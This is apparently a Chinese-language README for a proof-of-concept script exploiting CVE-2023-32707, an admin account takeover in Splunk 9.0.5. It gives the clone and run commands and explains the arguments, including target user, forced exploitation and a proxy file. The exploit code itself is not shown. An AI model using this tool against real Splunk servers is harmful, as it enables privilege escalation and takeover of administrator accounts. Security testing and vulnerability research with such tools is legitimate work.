基于 exploitdb 上报告的 CVE 改进的 POC 利用脚本
漏洞标题:Splunk 9.0.5 - 管理员账户接管 CVE:CVE-2023-32707
该脚本用于利用 Splunk 9.0.5 中的一个漏洞,导致管理员账户被接管。该漏洞利用拥有 edit_user 能力的低权限用户来提升权限。
pip3 install -r requirements.txt 安装):
克隆仓库:
git clone https://github.com/9xN/CVE-2023-32707.git
cd CVE-2023-32707
使用所需参数运行脚本:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit
将 <splunk_host>、<splunk_username>、<splunk_password> 和 <target_user> 替换为你的 Splunk 服务器信息。
--host:Splunk 主机或 IP 地址(必需)--username:Splunk 用户名(必需)--password:Splunk 密码(必需)--target-user:要进行账户接管的目标用户(必需)--force-exploit:强制利用(可选)--proxy-file:包含代理设置的文件(可选)要使用代理,请指定 --proxy-file 并提供包含代理设置的文件路径。
示例:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit --proxy-file proxies.txt